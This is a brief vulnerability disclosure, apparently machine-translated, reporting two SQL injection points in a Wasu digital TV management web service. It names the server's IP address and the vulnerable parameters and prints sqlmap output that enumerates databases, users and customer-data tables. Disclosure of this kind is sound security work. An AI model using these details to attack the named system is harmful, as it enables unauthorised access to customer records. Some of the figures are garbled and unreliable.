Wasu digital TV Management System WebService query interface Injection
Wasu digital TV Management System WebService query interface there are two injection exposed about 100,000 information
Detailed description:
Http: // 218.108.234.212/DtvWebService. asmx
Query interface
QueryLevel
Enable the VOD permission at OpenLevel
There are two injections
Proof of vulnerability:
Sqlmap runnable
Current user: 'cqz'
Current database: 'dtvmanage'
Current user is DBA: False
Available databases [8]:
[*] DtvManage
[*] Master
[*] Model
[*] Msdb
[*] Northwind
[*] Phone
[*] Pubs
[*] Tempdb
Database: DtvManage
+ ---------------------- + --------- +
| Table | Entries |
+ ---------------------- + --------- +
| Dbo. OptRecord | 127182 |
| Dbo. ViewOptRecord | 1, 97153 |
| Dbo. ViewRealBill | 19302 |
| Dbo. ViewDayBillCount | 1, 5737 |
| Dbo. GuestInfo | 3705 |
| Dbo. viewstbidinformation | 3705 |
| Dbo. ViewGuestInfo | 930 |
| Dbo. Users | 147 |
| Dbo. ViewUser | 147 |
| Dbo. sysconstraints | 41 |
| Dbo. response code | 31 |
| Dbo. PayIni | 29 |
| Dbo. ViewPayINI | 29 |
| Dbo. UserLevel | 4 |
| Dbo. syssegments | 3 |
+ ---------------------- + --------- +
Solution:
Filter interfaces are equally important.